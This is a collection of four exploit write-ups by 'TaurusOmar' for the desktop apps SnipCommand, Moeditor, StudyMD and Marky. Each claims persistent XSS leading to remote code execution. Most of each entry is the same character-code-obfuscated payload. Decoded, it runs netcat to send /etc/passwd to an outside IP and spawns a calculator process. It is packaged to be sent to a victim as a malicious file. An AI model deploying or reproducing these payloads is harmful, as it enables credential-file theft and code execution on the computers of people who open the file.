# Exploit Title: SnipCommand 0.1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/gurayyarar/SnipCommand # Version: 0.1.0 # Tested on: Windows, Linux, MacOs # Software Description: Open source command snippets manager for organize and copy fast. It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags. # Vulnerability Description: The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/I2reH1M # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

# Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://moeditor.js.org/ # Version: 0.2.0 # Tested on: Windows, Linux, MacOs # Software Description: Software to view and edit sales documentation Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/UdP4JaX # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

# Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jotron/StudyMD # Version: 0.3.2 # Tested on: Windows, Linux, MacOs # Software Description: A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard. Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure. # Vulnerability Description: The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/lDHKEIp # Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

# Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/vesparny/marky # Version: 0.0.1 # Tested on: Linux, MacOs, Windows # Software Description: Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/qclfrUx # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)